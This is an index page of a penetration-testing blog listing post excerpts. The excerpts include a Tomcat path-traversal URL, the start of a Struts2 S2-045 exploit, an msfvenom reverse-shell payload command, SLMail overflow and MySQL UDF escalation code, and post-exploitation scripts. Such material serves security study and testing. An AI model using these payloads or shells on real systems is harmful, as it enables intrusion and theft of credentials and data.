自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Nixawk

Get More About Security.

  • 博客(341)
  • 资源 (1)
  • 收藏
  • 关注

原创 Pentesters Group

Referenceshttps://github.com/nixawk/pentest-wiki/

2016-12-29 20:55:53 602

原创 Security Lab

Following table gives the URLs of all the vulnerable web applications,operating system installations, old software and war games [hacking] sites. TheURLs for individual applications that are part of o

2014-08-10 22:40:16 2180

转载 Exploit - Apache Tomcat Directory/Path Traversal

http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/usersPrevious URL would copy file na

2017-04-06 18:20:06 1810

原创 Exploit - RFID

RFID HackingPrepareInstall Proxmark3Check Proxmark3 / card statusCrack KeysPRNG AttackNESTED AttackDump data & Write dataPrepareInstall Proxmark3$ sudo apt-get install git build-essential libread

2017-04-01 13:24:32 1466

原创 Python - decode ip header

#!/usr/bin/python# -*- coding: utf-8 -*-from ctypes import *import socketimport structclass IP(Structure): _fields_ = [ ("ihl", c_uint8, 4), ("version", c_uint8, 4), ("to

2017-03-30 11:51:07 1242

原创 Python - NTP

In order to learn ntp protocol and protect ntp server against NTP DDOS Attack. We need a vulnable ntp server.Install a vulnerable NTP Server - NTP 4.2.6#!/bin/bashwget -c https://www.eecis.udel.edu/~nt

2017-03-28 12:41:50 1297

原创 Exploit - mysql unsha1

mysql-unsha1Authenticate against a MySQL server without knowing the cleartext password.AbstractThis PoC shows how it is possible to authenticate against a MySQL server under certain circumstances with

2017-03-27 11:45:47 1123

原创 exploit - dahua camera backdoor

Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.Exploit CodeI’ll share it later.$ python exploit_dahua.py 192.168

2017-03-17 17:13:15 7847

原创 Python - rpcinfo

In order to scan all rpc hosts in lannet and save it into the databse, we need to create a script. $ rpcinfo -p 10.94.106.24 program vers proto port 100000 4 tcp 111 rpcbind 100

2017-03-15 13:30:03 1025

原创 Compile zmap in Mac OSX

The quickest way to install zmap in Mac OSX is :$ brew install zmapBut, it may fails at sometimes. ex:$ time zmap -o icmpscan.csv --probe-module icmp_echoscan --whitelist-file=wh.txtMar 09 12:23:26.57

2017-03-09 13:34:42 768

原创 exploit - CVE-2017-5638 - Apache Struts2 S2-045

Metasploit-FrameworkExp Code#!/usr/bin/python# -*- coding: utf-8 -*-import urllib2import httplibdef exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlCo

2017-03-07 17:13:45 5141 1

原创 python - weixin bot

If you are a newbee, please just run it. If you are a developer. please use it as a module.python>>> import webwxbot>>> dir(webwxbot)>>> wx = webwxbot.WEIXINBOT()>>> dir(wx)['__class__', '__delatt

2017-03-02 19:20:57 808

转载 Burpsuite - Extension: SQLipy

Referenceshttps://github.com/codewatchorg/sqlipy/blob/master/SQLiPy.pyhttps://www.codewatch.org/blog/?p=402

2017-01-03 18:24:38 1179

原创 Burpsuite - Extension: Import Links into Sitemap

How to import Links into Sitemap ?Please select “Import Links from a file” in the right menu.Note: If the links file is too large, it may cost too much !Codefrom burp import IBurpExtenderfrom burp im

2017-01-03 15:30:41 807

原创 Burpsuite - Extension: Bulk Requests

Site Map Fetcher, This extension fetches the responses of unrequested items in the site map. When browsing a target, Burp adds to the site map any items that are inferred from actual responses. Some of

2017-01-03 11:22:27 530

原创 Burpsuite - Extension: Get All Proxied Hosts

How to get all proxied hosts from burpsuite sitemap ?from burp import IBurpExtenderfrom burp import IContextMenuFactoryfrom javax.swing import JMenuItemfrom java.util import List, ArrayListfrom java

2017-01-01 19:43:45 382

原创 Docker - Cannot connect to the Docker daemon

Start docker, and pull bkimminich/juice-shop. Console says$ docker pull bkimminich/juice-shopUsing default tag: latestWarning: failed to get default registry endpoint from daemon (Cannot connect to t

2016-12-27 18:21:33 4234

原创 Router - Netgear Remote Command Injection

DescriptionNETGEAR is aware of the security issue #582384 that allows unauthenticated web pages to pass form input directly to the command-line interface. A remote attacker can potentially inject arbit

2016-12-15 14:33:27 431

原创 Android - Application Reversing

How to pwn cocon.apk ?A CTF Android apk called cocon.apk, and we need to decrypt the hash value (ctf flag). Please prepare a smartphone and install the apk file. If successful, android desktop will sho

2016-12-13 14:29:47 626

原创 Metasploit - ERROR: cannot discover where libxml2 is located on your system

metasploit-framework [rapid7-master] ->> rvm listrvm rubies=* ruby-2.3.3 [ x86_64 ]# => - current# =* - current && default# * - defaultWhen ruby is updated from ruby-2.3.1 to ruby-2.3.3. It will ma

2016-12-07 13:57:47 1387

原创 Metasploit - spawn a cmd shell into meterpreter

generate vbs payload with metasploit./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 EXITFUNC=thread -f vbs --arch x86 --platform winNo encoder or badchars specified, outpu

2016-11-01 18:45:16 860

原创 Pentest - mysql udf privilege escalation

How to compile UDF DLL#include <stdio.h>#include <stdlib.h>enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};typedef struct st_udf_args { unsigned int arg_count; // num

2016-10-31 22:46:53 891

原创 Python - rq / mrq / Celery

rqSimple job queues for Python http://python-rq.orgPlease read the results from redis server.mrqMr. Queue - A distributed worker task queue in Python using Redis & gevent - https://github.com/pricingas

2016-10-26 14:01:17 1521

原创 Metasploit - auxiliary/gather/censys_search

msf > use auxiliary/gather/censys_search msf > set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX msf >set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX msf >set CENSYS_DORK rapid7Certificates Sea

2016-10-25 12:04:10 911

原创 Metasploit - auxiliary/gather/zoomeye_search

How to use ZoomEye API ?If you are a python developer, please view ZoomEye-SDK. If not, ZoomEye API Documentation is good for you.$ sudo easy_install zoomeye-SDKor$ sudo pip install git+https://github.

2016-10-19 01:08:53 4556

转载 PowerShell - PowerShell’s Security Guiding Principles

PS C:\Users\test\Desktop\PowerSploit-master\Exfiltration> Set-ExecutionPolicy DefaultExecution Policy ChangeThe execution policy helps protect you from scripts that you do not trust. Changing the exec

2016-10-15 22:03:47 618

转载 Pentest - PowerShell and Token Impersonation

This post will discuss bringing incognito-like functionality to PowerShell in the form of a new PowerShell script (Invoke-TokenManipulation), with some important differences. I’ll split this post up in

2016-10-15 17:58:34 656

原创 Metasploit - enmu_linux

enum_linux.rcrun post/linux/gather/enum_configsrun post/linux/gather/enum_protectionsrun post/linux/gather/enum_systemrun post/linux/gather/enum_xchatrun post/linux/gather/enum_networkrun post/lin

2016-10-14 13:45:00 429

原创 Python - WIFI Scan

How to find weak wireless APs with SSID:BSSID ? #!/usr/bin/python# -*- coding: utf8 -*-from access_points import get_scannerdef parse_apinfo(ap): return (ap['quality'], ap['ssid'], ap['bssid'])d

2016-10-09 10:27:42 3674 1

原创 Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure

Summary A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to ret

2016-09-29 21:26:54 1150

原创 Vuln - Cisco - CVE-2016-6366

https://github.com/RiskSense-Ops/CVE-2016-6366/Exploit Cisco CVE-2016-6366msf auxiliary(snmp_login) > set PASSWORD publicPASSWORD => publicmsf auxiliary(snmp_login) > set RHOSTS 192.168.206.114RHOST

2016-09-26 16:46:57 2039

转载 Linux - How to check processor and cpu details

Processor/CPU detailsThe details about the processor that we shall be talking about include, number of cores, availability of hyper threading, architecture, cache size etc. To find these details about

2016-09-20 11:17:59 825

原创 vuln - SugarCRM 6.5.23 - REST PHP Object Injection Exploit

Deploy a vuln labPlease install docker yourself.#!/bin/bashdocker build -t sugarcrm:CVE-2016-7124 -f Dockerfile .docker run -p 3306:3306 -p 80:80 sugarcrm:CVE-2016-7124Dockerfile# docker php tag list

2016-09-15 00:07:05 913

转载 How to scan whole Internet 3.7 billion IP addresses in few minutes?

Cyber security audit and ethical hacking training professionals normally use scanner to scans the networks. Scanning every IP address on the internet isn’t an easy job, and if you don’t have the resour

2016-09-12 18:13:49 424

原创 Linux - mipsel/mips/arm/armeb - gdb compile

If you don’t know what’s buildroot ?, please redirect to https://www.uclibc.org/How to install buildrootroot@lab:~# uname -aLinux lab 4.3.0-kali1-686-pae #1 SMP Debian 4.3.5-1kali1 (2016-02-11) i686 G

2016-08-22 17:24:32 2485

原创 Linux - mysql sql injection

select user from user where user=’ro’ ‘ot’=0;When user is root, it should query as follow:1. select user from user where user='ro' 'ot'=0;2. select user from user where 'root'='ro' 'ot'=0;3. select

2016-08-19 18:10:05 480

原创 Pentest - routersploit

$ git clone https://github.com/reverse-shell/routersploit$ sudo pip install -r requirements.txt$ python2 rsf.py ______ _ _____ _ _ _ | ___ \ | |

2016-08-16 23:21:31 2390

原创 Linux - setup a tftp server

tftp serverroot@kali:~# atftpdUsage: tftpd [options] [directory] [options] may be: -t, --tftpd-timeout <value>: number of second of inactivity before exiting -r, --retry-timeout <value>: time to

2016-08-10 12:02:28 608

原创 Linux - rpcclient

Demoroot@kali:~/reports# rpcclient -U "" 10.11.1.227Enter 's password: rpcclient $> help--------------- ---------------------- CLUSAPI clusapi_open_cluster blaclusapi_ge

2016-08-06 13:37:55 1944

原创 exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit

https://www.exploit-db.com/exploits/638/#!/usr/bin/python# -*- encoding: utf-8 -*-import sysimport socketimport struct## OS Name: Microsoft Windows XP Professional# OS Version:

2016-07-26 22:30:52 2690

grep中文手册

grep v 2.14 中文手册, 遵循 GNU 自由文档许可条款, 用户可以复制, 发布, 修改该文档内容, 1.3 版 或 最 新版由自由软件组织(FSF)发布; 没有固定段落, 没有封面文字, 没有封底文字. “GNU Free Documentation License” 部分包含证书副本.

2014-04-21

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除